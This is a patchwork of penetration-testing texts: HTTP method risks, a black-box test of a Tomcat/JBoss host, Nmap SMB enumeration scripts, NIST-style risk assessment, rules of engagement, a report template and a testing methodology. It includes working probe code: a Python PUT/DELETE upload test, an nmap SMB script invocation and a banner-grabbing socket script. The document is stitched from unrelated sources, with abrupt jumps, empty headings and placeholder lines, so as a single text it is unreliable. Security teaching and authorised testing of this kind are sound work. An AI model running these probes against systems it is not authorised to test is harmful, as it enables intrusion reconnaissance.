method is used to retrieve the information that is requested. The GET method is one of the most common ways to retrieve web resources. The HEAD method is similar to the GET method but retrieves only header information. The POST method is used to send a request with an entity enclosed in its body; the response to this request is determined by the server. The PUT method is used to store the enclosed entity on a server, while the DELETE method is used to remove resources from the server. The TRACE method returns the request as received by the final recipient so that the client can diagnose the communication. Finally, the CONNECT method creates a tunnel through a proxy. There are also extended HTTP methods such as Web-based Distributed Authoring and Versioning (WebDAV). WebDAV can be used by clients to publish web content and involves a number of other HTTP methods such as PROPFIND, MOVE, COPY, LOCK, UNLOCK, and MKCOL (Goland, Whitehead, Faizi, Carter, & Jensen, 1999). HTTP methods can help developers in the deployment and testing of web applications; on the other hand, when they are configured improperly, these methods can be used for malicious activity.
a firewall. Since the purpose of this paper is to demonstrate the usage of dangerous HTTP methods, some general steps, such as NMAP scanning, are not described extensively.
Network diagram
Reconnaissance
This penetration test is a black box test; the penetration tester does not have any knowledge of the target systems. At this point, the penetration tester only knows the company name and the IP address ranges, subnet 10.10.10.0/24 and subnet 192.168.10.0/24. First, the penetration tester runs an NMAP scan against these two networks and finds the following: 10.10.10.1 is a network device with no ports open; 192.168.10.10 is Windows XP running Tomcat 5.0/JBoss 4.0 with TCP port 80 open. Since port 80 is listening on host 192.168.10.10, the penetration tester checks further and finds that HTTP methods are enabled on the host. There are several ways to check the enabled methods; the easiest is a telnet command, as shown below. The result shows that the host accepts many dangerous HTTP methods, such as PUT and DELETE.
telnet 192.168.10.10 80
OPTIONS / HTTP/1.1
Host: 192.168.10.10

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
Content-Length: 0
Date: Tue, 03 Jan 2012 20:07:11 GMT
Server: Apache-Coyote/1.1
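Once OPTIONS reports PUT and DELETE, the tester can verify that they actually work by uploading and then removing a harmless marker file; a sketch against the host above, where the file name is hypothetical and the expected status codes may vary by server.

import requests

base = "http://192.168.10.10"
test_file = base + "/pentest_probe.txt"   # hypothetical, harmless marker file

put_resp = requests.put(test_file, data="penetration test marker", timeout=10)
print("PUT:", put_resp.status_code)

if put_resp.status_code in (200, 201, 204):
    print("PUT is writable -> arbitrary files can be uploaded to the server")
    # Clean up with the equally dangerous DELETE method.
    del_resp = requests.delete(test_file, timeout=10)
    print("DELETE:", del_resp.status_code)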
The Nmap scripting engine is a powerful tool for user-created scripts. This power is demonstrated in the suite of scripts designed to inspect Windows over the SMB protocol. Many footprinting tasks can be performed, including finding user accounts, open shares, and weak passwords. All these tasks fall under a common framework and share authentication libraries, which gives users a common and familiar interface. With modern script libraries, which were written by the author, the Nmap Scripting Engine (NSE) has the ability to establish a null or authenticated session with all modern versions of Windows. By leveraging these sessions, scripts can probe and explore Windows systems in great depth, providing an attacker with invaluable information about the server. Nmap, a network scanner, is among the best known security tools and is considered one of the best free security tools in existence (Darknet, 2006). The typical use and functionality of Nmap is beyond the scope of this paper, but familiarity with it will make this paper far easier to understand. The book Nmap Network Scanning, which is partially available for free, is one of the best information sources (Lyon, 2009). The Nmap Scripting Engine, or NSE, is an extension to Nmap developed with several purposes in mind, including advanced network discovery, sophisticated version detection, vulnerability detection, backdoor detection, and vulnerability exploitation (Lyon, 2009). After Nmap scans a group of hosts, NSE runs scripts against each host that matches specific criteria (for example, the host has the appropriate ports open). These scripts, which are written in the Lua programming language, can inspect the host in a much deeper and more sophisticated way than Nmap alone. Since Lua is a complete programming language, the possibilities for scripts are great. In addition to the power of scripts, another important aspect is the development culture. Since scripts can be written by anyone, and Lua is a relatively simple language
for programmers to learn, it is not difficult for a programmer to begin developing his or her own script. With a fairly small team of core developers and an active mailing list, getting started in script development is easy.
SMB_COM_NEGOTIATE
The SMB_COM_NEGOTIATE packet is the first one sent by the client, and is the client's opportunity to indicate which protocols, flags, and options it understands. The
server responds with its preferred protocol, options, and flags, based on the client's list. The options and flags reveal certain configuration options to the client, such as whether or not message signatures are supported or required, whether or not the server requires plaintext passwords, and whether share-level or user-level authentication is understood. These options are probed by the script smb-security-mode.nse. The following is an example of its output against a typical configuration of Windows:
Some of these options are revealing from a penetration tester's perspective. For example, this server does not support message signing; as a result, man-in-the-middle attacks are possible. However, since message signing is not a default option on Windows, this is not a surprising state. If share-level security or plaintext passwords were required, however, that would be an interesting find. Implementing CIFS has more information about the different levels of security supported by SMB. In addition to the security information, the response to SMB_COM_NEGOTIATE also reveals the server's time and timezone, as well as the name of the server and its workgroup or domain membership. Revealing the time may be useful to a penetration tester because it is a sign of how well maintained a server is. The name and workgroup of the server can help a penetration tester determine the purpose of a server or a network, leading to more targeted attacks. The script smb-os-discovery.nse probes for the server's name and time. The following output is from smb-os-discovery run against a poorly maintained Windows 2000 test server:
From the name and time alone, it can be determined that the operating system is Windows 2000 ("RON-WIN2K-TEST"), that it is a test machine, and that the time is off by about an hour (the current time is 11:03, but the server returns 11:59). One may conclude that it is a test server running on an outdated operating system, and that it is poorly maintained or infrequently used. This information could be valuable to a penetration tester when choosing a target, since the chances that this server has unpatched vulnerabilities are high. On a large network, this can quickly give a sense of a network's composition and purpose.
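Both probes described here can be run straight from Nmap; a typical invocation against a single host (target address hypothetical) is:

nmap -p 445 --script smb-security-mode.nse,smb-os-discovery.nse 192.0.2.5

Nmap first confirms that the SMB port is open and then runs the two scripts, printing their findings beneath the port entry in the scan report.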
SMB_COM_SESSION_SETUP_ANDX
The SMB_COM_SESSION_SETUP_ANDX packet is sent by the client immediately after the negotiate response is received. The packet's primary purpose is authentication, and it contains the client's username, domain, and password. Unless plaintext authentication was requested in the negotiate packet, the password is hashed with one of Microsoft's hashing algorithms (both Lanman and NT Lanman (NTLM) are used by default). Recovering the password from one of these hashes is supposed to be difficult (although in practice it is usually straightforward). Instead of sending a username and password, the client may also establish a null (or anonymous) session by sending a blank username and a blank password. For the purposes of these scripts, four account types are defined. Anonymous accounts, commonly called a null session, offer little access to the system, except on Windows 2000. Guest accounts offer slightly more access and can find some interesting information; the guest account typically has no password and is disabled by default on many Windows versions. Under certain configurations, such as Windows XP's default settings, all user accounts, including administrators, are treated as guests (Microsoft, 2005). User-level accounts are common and are able to perform most checks; they are defined as any account on a system that is not in the Administrators group. Finally, administrator-level accounts are accounts in the Administrators group. Administrative accounts can run every test against Windows 2003 and earlier, but are essentially the same as user-level accounts on Windows Vista and higher unless user account control (UAC) is disabled. The server's response to the SMB_COM_SESSION_SETUP_ANDX packet contains a true/false value indicating whether or not the username/password combination was accepted. If it was accepted, which is always the case when an anonymous (null) session is requested, the server also includes its operating system and LAN manager version in the reply. The smb-os-discovery.nse script will authenticate anonymously and display the operating system information. The following examples show the smb-os-discovery.nse script being run against Windows 2000 and Windows 2003:
For instance, a Vulnerability Analysis exercise might identify the absence of anti-virus software on the system or open ports as a vulnerability. The Penetration Test will determine the level to which existing vulnerabilities can be exploited and the damage that can be inflicted as a result. A Vulnerability Analysis answers the question: what are the present vulnerabilities and how do we fix them? A Penetration Test simply answers the question: can any external attacker or internal intruder break in, and what can they attain? A Vulnerability Analysis works to improve security posture and develop a more mature, integrated security program, whereas a Penetration Test is only a snapshot of a security program's effectiveness. A Vulnerability Assessment commonly goes through the following phases: Information Gathering, Port Scanning, Enumeration, Threat Profiling & Risk Identification, Network Level Vulnerability Scanning, Application Level Vulnerability Scanning, Mitigation Strategies Creation, Report Generation, and Support. A Penetration Testing service, however, has the following phases: Information Gathering, Port Scanning, Enumeration, Social Engineering, Threat Profiling & Risk Identification, Network Level Vulnerability Assessment, Application Level Vulnerability Assessment, Exploit Research & Development, Exploitation, Privilege Escalation, Engagement Analysis, Mitigation Strategies, Report Generation, and Support.
RISK ANALYSIS
Risk is the net negative impact of the exercise of a vulnerability, considering both the probability and the impact of occurrence. Risk management is the process of identifying risk, assessing risk, and taking steps to reduce risk to an acceptable level. This guide provides a foundation for the development of an effective risk management program, containing both the definitions and the practical guidance necessary for assessing and mitigating risks identified within IT systems. The ultimate goal is to help organizations better manage IT-related mission risks. In addition, this section provides information on the selection of cost-effective security controls. These controls can be used to mitigate risk for the better protection of mission-critical information and the IT systems that process, store, and carry this information. Organizations may choose to expand or abbreviate the comprehensive processes and steps suggested in this guide and tailor them to their environment in managing IT-related mission risks.
The following personnel should support and use the risk management process:
- Senior management, the mission owners, who make decisions about the IT security budget
- Federal Chief Information Officers, who ensure the implementation of risk management for agency IT systems and the security provided for these IT systems
- The Designated Approving Authority (DAA), who is responsible for the final decision on whether to allow operation of an IT system
- The IT security program manager, who implements the security program
- Information system security officers (ISSO), who are responsible for IT security
- IT system owners of system software and/or hardware used to support IT functions
- Information owners of data stored, processed, and transmitted by the IT systems
- Business or functional managers, who are responsible for the IT procurement process
- Technical support personnel (e.g., network, system, application, and database administrators; computer specialists; data security analysts), who manage and administer security for the IT systems
- IT system and application programmers, who develop and maintain code that could affect system and data integrity
- IT quality assurance personnel, who test and ensure the integrity of the IT systems and data
- Information system auditors, who audit IT systems
- IT consultants, who support clients in risk management
Many people decide to have home security systems installed and pay a monthly fee to a service provider to have these systems monitored for the better protection of their property. Presumably, the homeowners have weighed the cost of system installation and monitoring against the value of their household goods and their family's safety, a fundamental mission need. The head of an organizational unit must ensure that the organization has the capabilities needed to accomplish its mission. These mission owners must determine the security capabilities that their IT systems must have to provide the desired level of mission support in the face of real-world threats. Most organizations have tight budgets for IT security; therefore, IT security spending must be reviewed as thoroughly as other management decisions. A well-structured risk management methodology, when used effectively, can help management identify appropriate controls for providing the mission-essential security capabilities.
Phase 1 - Initiation: The need for an IT system is expressed and the purpose and scope of the IT system is documented.
Phase 2 - Development or Acquisition: The IT system is designed, purchased, programmed, developed, or otherwise constructed.
Phase 3 - Implementation: The system security features should be configured, enabled, tested, and verified.
Phase 4 - Operation or Maintenance: The system performs its functions. Typically the system is being modified on an ongoing basis through the addition of hardware and software and by changes to organizational processes, policies, and procedures.
Phase 5 - Disposal: This phase may involve the disposition of information, hardware, and software. Activities may include moving, archiving, discarding, or destroying information and sanitizing the hardware and software. Risk management activities are performed for system components that will be disposed of or replaced to ensure that the hardware and software are properly disposed of, that residual data is appropriately handled, and that system migration is conducted in a secure and systematic manner.
RISK ASSESSMENT
Risk assessment is the first process in the risk management methodology. Organizations use risk assessment to determine the extent of the potential threat and the risk associated with an IT system throughout its SDLC. The output of this process helps to identify appropriate controls for reducing or eliminating risk during the risk mitigation process, as discussed in Section 4. Risk is a function of the likelihood of a given threat-source's exercising a particular potential vulnerability, and the resulting impact of that adverse event on the organization. To determine the likelihood of a future adverse event, threats to an IT system must be analyzed in conjunction with the potential vulnerabilities and the controls in place for the IT system. Impact refers to the magnitude of harm that could be caused by a threat's exercise of a vulnerability. The level of impact is governed by the potential mission impacts and in turn produces a relative value for the IT assets and resources affected (e.g., the criticality and sensitivity of the IT system components and data). The risk assessment methodology encompasses nine primary steps:
1. System Characterization
2. Threat Identification
3. Vulnerability Identification
4. Control Analysis
5. Likelihood Determination
6. Impact Analysis
7. Risk Determination
8. Control Recommendations
9. Results Documentation
IMPACT ANALYSIS
The next major step in measuring the level of risk is to determine the adverse impact resulting from a successful threat exercise of a vulnerability. Before beginning the impact analysis, it is necessary to obtain the following information:
- System mission (e.g., the processes performed by the IT system)
- System and data criticality (e.g., the system's value or importance to an organization)
- System and data sensitivity
This information can be obtained from existing organizational documentation, such as the mission impact analysis report or asset criticality assessment report. A mission impact analysis (also known as business impact analysis [BIA] for some organizations) prioritizes the impact levels associated with the compromise of an organization's information assets based on a qualitative or quantitative assessment of the sensitivity and criticality of those assets. An asset criticality assessment identifies and prioritizes the sensitive and critical organizational information assets (e.g., hardware, software, systems, services, and related technology assets) that support the organization's critical missions. If this documentation does not exist or such assessments for the organization's IT assets have not been performed, the system and data sensitivity can be determined based on the level of protection required to maintain the system and data's availability, integrity, and confidentiality.
Regardless of the method used to determine how sensitive an IT system and its data are, the system and information owners are responsible for determining the impact level for their own system and information. Consequently, in analyzing impact, the appropriate approach is to interview the system and information owner(s). The adverse impact of a security event can be described in terms of loss or degradation of any, or a combination of any, of the following three security goals: integrity, availability, and confidentiality. The following list provides a brief description of each security goal and the consequence (or impact) of its not being met:
Loss of Integrity. System and data integrity refers to the requirement that information be protected from improper modification. Integrity is lost if unauthorized changes are made to the data or IT system by either intentional or accidental acts. If the loss of system or data integrity is not corrected, continued use of the contaminated system or corrupted data could result in inaccuracy, fraud, or erroneous decisions. Also, violation of integrity may be the first step in a successful attack against system availability or confidentiality. For all these reasons, loss of integrity reduces the assurance of an IT system.
Loss of Availability. If a mission-critical IT system is unavailable to its end users, the organization's mission may be affected. Loss of system functionality and operational effectiveness, for example, may result in loss of productive time, thus impeding the end users' performance of their functions in supporting the organization's mission.
Loss of Confidentiality. System and data confidentiality refers to the protection of information from unauthorized disclosure. The impact of unauthorized disclosure of confidential information can range from the jeopardizing of national security to the disclosure of Privacy Act data. Unauthorized, unanticipated, or unintentional disclosure could result in loss of public confidence, embarrassment, or legal action against the organization.
Some tangible impacts can be measured quantitatively in lost revenue, the cost of repairing the system, or the level of effort required to correct problems caused by a successful threat action. Other impacts (e.g., loss of public confidence, loss of credibility, damage to an organization's interests) cannot be measured in specific units but can be qualified or described in terms of high, medium, and low impact. Because of the generic nature of this discussion, this guide designates and describes only the qualitative categories: high, medium, and low impact.
RISK DETERMINATION
The purpose of this step is to assess the level of risk to the IT system. The determination of risk for a particular threat/vulnerability pair can be expressed as a function of:
- the likelihood of a given threat-source's attempting to exercise a given vulnerability;
- the magnitude of the impact should a threat-source successfully exercise the vulnerability; and
- the adequacy of planned or existing security controls for reducing or eliminating risk.
To measure risk, a risk scale and a risk-level matrix must be developed.
Likelihood Determination
To derive an overall likelihood rating that indicates the probability that a potential vulnerability may be exercised within the construct of the associated threat environment, the following governing factors must be considered:
- Threat-source motivation and capability
- Nature of the vulnerability
- Existence and effectiveness of current controls
The likelihood that a potential vulnerability could be exercised by a given threat-source can be described as high, medium, or low.
Likelihood Definitions
Risk-Level Matrix
The final determination of mission risk is derived by multiplying the ratings assigned for threat likelihood (i.e., probability) and threat impact. The table below shows how the overall risk ratings might be determined based on inputs from the threat likelihood and threat impact categories. The matrix below is a 3 x 3 matrix of threat likelihood (High, Medium, and Low) and threat impact (High, Medium, and Low). Depending on the site's requirements and the granularity of risk assessment desired, some sites may use a 4 x 4 or a 5 x 5 matrix. The latter can include a Very Low/Very High threat likelihood and a Very Low/Very High threat impact to generate a Very Low/Very High risk level. A Very High risk level may require possible system shutdown or stopping of all IT system integration and testing efforts. The sample matrix shows how the overall risk levels of High, Medium, and Low are derived. The determination of these risk levels or ratings may be subjective; the rationale can be explained in terms of the probability assigned to each threat likelihood level and the value assigned to each impact level. For example: the probability assigned to each threat likelihood level is 1.0 for High, 0.5 for Medium, and 0.1 for Low; the value assigned to each impact level is 100 for High, 50 for Medium, and 10 for Low.
Risk-Level Matrix
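The sample probabilities and impact values above translate directly into a small calculation; the sketch below reproduces the 3 x 3 matrix, with the High/Medium/Low score thresholds (above 50, above 10, and 10 or below) assumed from the sample scale rather than taken from this text.

# Risk = threat likelihood probability x impact value, per the sample scale above.
LIKELIHOOD = {"High": 1.0, "Medium": 0.5, "Low": 0.1}
IMPACT = {"High": 100, "Medium": 50, "Low": 10}

def risk_level(score):
    # Assumed thresholds: above 50 is High, above 10 up to 50 is Medium, else Low.
    if score > 50:
        return "High"
    if score > 10:
        return "Medium"
    return "Low"

for likelihood, p in LIKELIHOOD.items():
    for impact, v in IMPACT.items():
        score = p * v
        print("%-6s likelihood x %-6s impact = %5.1f -> %s risk"
              % (likelihood, impact, score, risk_level(score)))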
KEY ROLES
Risk management is a management responsibility. This section describes the key roles of the personnel who should support and participate in the risk management process.
Senior Management. Senior management, under the standard of due care and ultimate responsibility
for mission accomplishment, must ensure that the necessary resources are effectively applied to develop the capabilities needed to accomplish the mission. They must also assess and incorporate results of the risk assessment activity into the decision making process. An effective risk management program that assesses and mitigates IT-related mission risks requires the support and involvement of senior management.
Chief Information Officer (CIO). The CIO is responsible for the agency's IT planning, budgeting, and performance, including its information security components. Decisions made in these areas should be based on an effective risk management program.
System and Information Owners. The system and information owners are responsible for ensuring
that proper controls are in place to address integrity, confidentiality, and availability of the IT systems and data they own. Typically the system and information owners are responsible for changes to their IT systems. Thus, they usually have to approve and sign off on changes to their IT systems (e.g., system enhancement, major changes to the software and hardware). The system and information owners must therefore understand their role in the risk management process and fully support this process.
Business and Functional Managers. The managers responsible for business operations and IT
procurement process must take an active role in the risk management process. These managers are the individuals with the authority and responsibility for making the trade-off decisions essential to mission accomplishment. Their involvement in the risk management process enables the achievement of proper security for the IT systems, which, if managed properly, will provide mission effectiveness with a minimal expenditure of resources.
ISSO. IT security program managers and computer security officers are responsible for their
organizations' security programs, including risk management. Therefore, they play a leading role in introducing an appropriate, structured methodology to help identify, evaluate, and minimize risks to the IT systems that support their organizations' missions. ISSOs also act as major consultants in support of senior management to ensure that this activity takes place on an ongoing basis.
Security Awareness Trainers (Security/Subject Matter Professionals). The organization's personnel are the users of the IT systems. Use of the IT systems and data according to an organization's policies, guidelines, and rules of behavior is critical to mitigating risk and protecting the organization's IT resources. To minimize risk to the IT systems, it is essential that system and application users be provided with security awareness training. Therefore, the IT security trainers or security/subject matter professionals must understand the risk management process so that they can develop appropriate training materials and incorporate risk assessment into training programs to educate the end users.
3.3 Roles and Responsibilities of Penetration Testers
A security penetration test is an activity in which a test team (hereafter referred to as the Pen Tester) attempts to circumvent the security processes and controls of a computer system. Posing as external unauthorized intruders, the test team attempts to obtain privileged access, extract information, and demonstrate the ability to manipulate the target computer in ways that would be unauthorized if they occurred outside the scope of the test. Due to the sensitive nature of the testing, specific rules of engagement are necessary to ensure that testing is performed in a manner that minimizes impact on operations while maximizing the usefulness of the test results. This document provides guidance and formal documentation for the planning, approval, execution and reporting of external penetration testing.
Procedure: The Pen Test POC will be the individual responsible for coordinating penetration test activities and schedules and for notifying management of planned activities. The Pen Tester POC will be responsible for the penetration test team and will be the primary interface with the Pen Test POC for all penetration test activities. The Pen Tester shall develop the documentation and plans for the penetration test (see Appendices A and B for the Penetration Test Plan Template). As part of this effort, the Pen Tester shall identify and assign roles to the Pen Tester's team, identify major milestones for the tasks of the team, identify estimated dates upon which the major milestones will be completed, and indicate the critical path. The Pen Tester shall also identify the steps that will be taken to protect the Test Plan, results, and final deliverables. In conducting the penetration test, the following tasks shall be performed by the Pen Tester for the sites tested:
a. Introductory Briefing
   - Introduce key players
   - Provide an overview of Pen Tester capabilities
   - Explain the objectives of the penetration test
   - Review resources, logistics and schedule requirements
   - Schedule technical and administrative face-to-face meetings
b. Executive In-Briefing
   - Introduce the Pen Tester and key penetration testing staff
   - Review the objectives of the penetration test
   - Review the selected target systems
   - Review the plan and schedule for activities
   - Address issues and concerns
   - The Penetration Testing Plan and Rules of Engagement shall be signed by all parties prior to the start of testing activities
c. External Penetration Testing
   - Plan and schedule
   - Conduct penetration testing with the team (reconnaissance, exploitation of vulnerabilities, intrusion, compromise, analysis and recommendations)
d. Analysis of Data and Findings (off-site)
   - Correlate data and findings from discoveries and reviews
   - Analyze results from penetration testing
   - Compare requirements with industry standards
   - Document findings and prioritize recommended corrective actions with references to industry standards and requirements
   - Provide a briefing of findings, recommendations, and associated impacts to the Director of Information Security and the Assistant Vice President of Information Security and Special Projects
e. Completion Briefing
   - Summarize findings
   - Present final reports
   - Discuss external penetration testing results
   - Discuss the evaluation of the test site's IT security program and management structure
   - Discuss overall recommendations
The Pen Tester shall remove all data related to the IT Security Penetration test for each site from the Pen Tester's computer(s) by a method approved by the UC Information Security Director. All documents, data logs/files, test results and working papers generated by the Pen Tester for the IT Security Penetration test at each site shall not be retained by the Pen Tester.
5. Execution
Initial reconnaissance: Build up an understanding of the company or organization. This includes interrogating public domain sources such as whois records, finding IP ranges, ISPs, contact names, DNS records, website crawling, etc.
Service determination: The collection of IP addresses enables the investigation of available services. Scans for known vulnerabilities can also be performed using tools such as Nessus or ISS. If firewalls are found, attempts will be made to determine the firewall type. Note that most attacks are not against firewalls but rather go through the firewalls to the servers behind them (see my previous article on Web application security, Network Security, August edition).
Enumeration: The operating system and applications are identified. Banner grabbing, IP fingerprinting and mail bouncing should reveal servers. Usernames, exports, shares, etc. are also determined where possible.
Gain access: Once the testers have more knowledge of the systems, relevant vulnerability information will be researched, or new vulnerabilities found, in order to (hopefully) gain some level of access to the systems.
Privilege escalation: If an initial foothold can be gained on any of the systems being tested, the next step is to gain as much privilege as possible, i.e. NT Administrator or UNIX root privileges.
6. Reporting: summarized findings.
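The banner grabbing mentioned under enumeration takes only a few lines of socket code; a sketch with a hypothetical host and a handful of ports whose services commonly announce themselves.

import socket

target = "192.0.2.30"        # hypothetical host from the service determination step
for port in (21, 22, 25):    # FTP, SSH and SMTP servers commonly announce themselves
    try:
        with socket.create_connection((target, port), timeout=5) as s:
            banner = s.recv(1024).decode(errors="replace").strip()
            print("%s:%d %s" % (target, port, banner))
    except OSError:
        print("%s:%d no banner (closed or filtered)" % (target, port))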
7. External Penetration Report Template
Introduction
1. Date carried out
2. Testing Team details
   - Name
   - Contact numbers
   - Relevant experience if required
Network Details
1. Peer-to-Peer, Client-Server, Domain Model, Active Directory integrated
2. Number of servers and workstations
3. Operating system details
4. Major software applications
5. Hardware configuration and setup
6. Interconnectivity and by what means, i.e. T1, satellite, Wide Area Network, leased line, dial-up, etc.
7. Encryption/VPNs utilized, etc.
8. Role of the network or system
Scope of Test
1. Constraints and limitations imposed on the team, i.e. out-of-scope items, hardware, IP addresses
2. Constraints, limitations or problems encountered by the team during the actual test
3. Purpose of test, e.g. security assurance for the Code of Connection
4. Type of test
5. Test type:
   - White-Box: The testing team has prior knowledge of the network and has been supplied with network diagrams, hardware, operating system and application details etc. prior to the test being carried out. This does not equate to a truly blind test, but it can speed up the process a great deal and leads to more accurate results being obtained. The amount of prior knowledge leads to a test targeting the specific operating systems, applications and network devices that reside on the network rather than spending time enumerating what could possibly be on the network. This type of test equates to a situation whereby an attacker has complete knowledge of the internal network.
   - Black-Box: A web-based test is to be carried out and only the details of a website URL or IP address are supplied to the testing team. It is their role to attempt to break into the company website/network. This equates to an external attack carried out by a malicious hacker.
   - Grey-Box: The testing team simulates an attack that could be carried out by a disgruntled, disaffected staff member. The testing team is supplied with appropriate user-level privileges and a user account, and access is permitted to the internal network by relaxation of specific security policies present on the network, i.e. port-level security.
1. Executive Summary (Brief and Non-technical)
- problem area
- problem area
A methodology is a map by which you reach your final destination (the end of the test); without a methodology, testers may get lost (and arrive at the results mentioned above).
Proposed methodology
Proposed methodology model
While there are several available methodologies to choose from, each penetration tester should have their own methodology planned and ready for maximum effectiveness and to present to the client. In the proposed methodology, there are three main elements that must be fully understood and followed: 1. Information. Information gathering is essentially using the Internet to find all the information you can about the target (company and/or person) using both technical (DNS/WHOIS) and non-technical (search engines, news groups, mailing lists, etc.) methods. While conducting information gathering, it is important to be as imaginative as possible. Attempt to explore every possible avenue to gain more understanding of your target and its resources. Anything you can get hold of during this stage of testing is useful: company brochures, business cards, leaflets, newspaper adverts, internal paperwork, etc. Information gathering does not require that the assessor establish contact with the target system; information is collected (mainly) from public sources on the Internet and from organizations that hold public information (e.g. tax agencies, libraries, etc.). The information gathering section of the penetration test is important for the penetration tester. Assessments are generally limited in time and resources; therefore, it is critical to identify the points that are most likely to be vulnerable and to focus on them. Even the best tools are useless if not used appropriately, in the right place and at the right time. That is the reason why experienced testers invest a significant amount of time in information gathering. [4] There are commonly two types of penetration testing. When the information about the organization is closed (black box), the pen-tester performs the attack with no prior knowledge of the infrastructure, defence mechanisms and
communication channels of the target organization. A black box test is a simulation of an unsystematic attack by weekend or wannabe hackers (script kiddies). When the information is shared (white box), the pen-tester performs the attack with full knowledge of the infrastructure, defence mechanisms and communication channels of the target organization. A white box test is a simulation of a systematic attack by well-prepared outside attackers with insider contacts, or by insiders with largely unlimited access and privileges. If the penetration testers are using the black box approach, then information gathering must be planned out, because information gathering is one of the most important processes in penetration testing; it is one of the first phases in a security assessment and is focused on collecting as much information as possible about a target application. This task can be carried out in many different ways: by using public tools (search engines), scanners, or simple or specially crafted HTTP requests, it is possible to force the application to leak information, e.g. disclosing error messages or revealing the versions and technologies used. If the penetration testers are using the white box approach, the tester should target the information gathering procedure based on the scope (e.g. the client might give all the required information and might not want the testers to search for other information). Basically, there are four phases to information gathering:
Phase 1. The first step in information gathering is the network survey. A network survey is like an introduction to the system that is tested. It yields a network map, from which you can find the number of reachable systems to be tested without exceeding the legal limits of what you may test. Usually more hosts are detected during the testing; they should be added to the network map as well. The results that the tester might get from network surveying are:
- Domain Names
- Server Names
- IP Addresses
- Network Map
- ISP / ASP information
- System and Service Owners
Network surveying can be done using TTL modulation (traceroute) and record route (e.g. ping -R), although classical 'sniffing' is sometimes just as effective a method.
Phase 2. The second phase is OS identification (sometimes referred to as TCP/IP stack fingerprinting): the determination of a remote OS type by comparison of variations in OS TCP/IP stack implementation behavior. In other words, it is active probing of a system for responses that can distinguish its operating system and version level. The results are:
- OS Type
- System Type
- Internal system network addressing
The best known method for OS identification is using nmap.
Phase 3. The next step is port scanning. Port scanning is the invasive probing of system ports on the transport and network level. Included here is also the validation of system reception to tunneled, encapsulated, or routing protocols. Testing for different protocols will depend on the system type and the services it offers. Each Internet-enabled system has 65,536 possible TCP and UDP ports (including port 0). However, it is not always necessary to test every port for every system; this is left to the discretion of the test team. Port numbers that are important for testing according to the service are listed with the task. Additional port numbers for scanning should be taken from the Consensus Intrusion Database Project Site. The results that the tester might get from port scanning are:
- List of all open, closed or filtered ports
- IP addresses of live systems
- Internal system network addressing
- List of discovered tunneled and encapsulated protocols
- List of discovered supported routing protocols
Methods include SYN and FIN scanning, and variations thereof, e.g. fragmentation scanning.
Phase 4. Services identification. This is the active examination of the application listening behind the service. In certain cases more than one application exists behind a service, where one application is the listener and the others are considered components of the listening application. A good example of this is PERL installed for use in a web application: in that case the listening service is the HTTP daemon and the component is PERL. The results of service identification are:
- Service Types
- Service Application Type and Patch Level
- Network Map
The methods used in service identification are the same as in port scanning. There are two ways in which you can perform information gathering: 1. The first method is to perform information gathering with a 'one to one' or 'one to many' model; i.e. a tester performs techniques in a linear way against either one target host or a logical grouping of target hosts (e.g. a subnet). This method is used to achieve immediacy of the result and is often optimized for speed and executed in parallel (e.g. nmap). 2. The other method is to perform information gathering using a 'many to one' or 'many to many' model. The tester utilizes multiple hosts to execute information gathering techniques in a random, rate-limited, non-linear way. This method is used to achieve stealth (distributed information gathering). 2. Team. Penetration testing is most effective when performed by a team of professionals in which everyone has appointed roles and responsibilities and knows what to do and how to do it. In penetration testing, as in any field, each team member must know their part in the team and should follow the assigned procedure (e.g. the network administrator should not be searching for vulnerabilities through the website) in order for the test to be quick and efficient (e.g. the security consultant is responsible for making the report clear and understandable, so that the technicians can focus on testing rather than reporting). 3. Tools. The last essential part of the test is the toolkit. Penetration testers each have their own toolset for performing a penetration test. These tools are usually chosen to make their work most effective (a test cannot be effective if the owner of the system assigns tools with which the testers are not familiar). There are many tools available, many of them free, but penetration testers should have excellent command of at least some of them rather than knowing most of them at an average level. It is also vital for testers to choose their toolkits wisely, since there is more than one area in which to perform a penetration test (software development, network). For example, network vulnerability scanners that try to evade detection by IDS and IPS devices would normally not be useful for software development. So the testers should choose a toolkit with features that are suitable for them (e.g. configurability, extensibility). 4. Policy. 1. The Company must provide the penetration tester with certain required information regarding the scope and range of the tests, and all information provided must be true and accurate.
This is done for the purpose of:
- Accuracy: with the defined scope, the test will be pinpointed, and the tester will have a test map to follow throughout the test.
- Confidentiality: with the defined ranges of the test, the tester will not be testing and/or acquiring information that is confidential even to the tester.
- Resource saving: with the defined scope and range, the tester will not spend time and human resources on testing non-required targets.

2. The penetration tester must gather all the information required for the testing only within the defined boundaries of the test, and all of this information must be reported completely at the end of the test. Purpose:
- Privacy: all of the gathered information must be reported so that there will be no information leaks.

3. The Company and the tester must agree upon a timing table for the tests. Purpose:
- Safety: tests will be carried out in a period that is not harmful to the Company (e.g. a DoS attack will not be carried out in a busy network period).

4.1 The penetration tester must be held responsible for all damage that occurs as a result of the testing. The penalty for the damage (data loss, equipment destruction) should be agreed upon and stated in the contract prior to the testing.

4.2 Damage that occurs through no fault of the test is the responsibility of the Company. There are cases where damage occurs that is not the responsibility of the tester; for example, a DoS attack is carried out that leads to financial loss (because of no service), but the timing of the DoS attack was not agreed upon. This is why timing is important (refer to policy rule 3).

5. The Company and the penetration tester must keep all information about the test, including the contract, confidential. No information about the contract, terms or fees should be released by either party. Information about the Company's business, computer systems or security situation that the tester obtains during the course of, and after the completion of, the test must not be released to any third party without prior written approval.

6. The provider may assign or sub-contract all or any part of its rights and obligations under a contract to third parties without the Company's prior written consent. Some penetration testing companies assign different stages of testing to third parties; this does not have to be approved by the client. The penetration tester utilizes a team approach, employing experts to test different security aspects. All sub-contractors employed by the penetration tester shall, however, be bound by the terms and conditions of the same contract as between the Company and the penetration tester.

7.1 The penetration tester and the Company may from time to time impart to each other certain confidential information relating to each other's business, including specific documentation. There are times when the tester might need additional information (contacts, accounts), and/or the client might provide additional information (e.g. passwords, user accounts) during the testing. All of this information must be kept as confidential as information given prior to the test or acquired during the testing (refer to policy rule 5).

7.2 Each party must use such confidential information only for the purposes of the test, and it must not be disclosed directly or indirectly to any third party.

8. After the completion of the testing and reporting, the provider has no rights to the information or the data of the Company, unless approved by the Company. During the testing, the penetration tester is granted access, and/or acquires access, to confidential information. After the completion of the test, the tester no longer has any right to the information, or to any further testing, unless the client approves.

